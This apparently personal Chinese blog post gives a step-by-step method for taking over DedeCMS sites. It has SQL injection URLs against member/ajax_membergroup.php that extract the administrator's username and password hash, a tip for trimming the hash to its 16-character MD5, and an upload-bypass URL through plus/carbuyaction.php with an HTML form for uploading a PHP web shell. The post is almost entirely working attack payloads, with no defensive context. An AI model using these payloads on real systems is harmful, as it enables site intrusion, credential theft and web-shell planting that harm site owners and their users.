Jitao's tweets

- Record something
首页 / 安全防范 / 正文

dedecms 拿shell

2019-04-26 安全防范 210 ℃ 0 评论
/data/admin/ver.txt
/member/ajax_membergroup.php?action=post&membergroup=1
查看管理员帐号
member/ajax_membergroup.php?action=post&membergroup=@`'`%20Union%20select%20userid%20from%20`%23@__admin`%20where%201%20or%20id=@`'`
查看管理员密码
/member/ajax_membergroup.php?action=post&membergroup=@`'`%20Union%20select%20pwd%20from%20`%23@__admin`%20where%201%20or%20id=@
19位的,去掉前三位和最后一位,得到管理员的16位MD5

上传文件:
/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs<code>=../dialog/select_soft_post

一句话
http://
 www.2cto.com 
/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs<code>=../dialog/select_soft_post"
 method="post"
 
enctype="multipart/form-data" name="form1">
file:<input name="uploadfile" type="file" /><br>
newname:<input name="newname" type="text" value="myfile.php"/>
<button class="button2" type="submit">提交</button><br><br>
文章教程:链接
0

上一篇:模拟器和游戏

下一篇:besTV盒子破解版

猜你喜欢

额 本文暂时没人评论 来添加一个吧

发表评论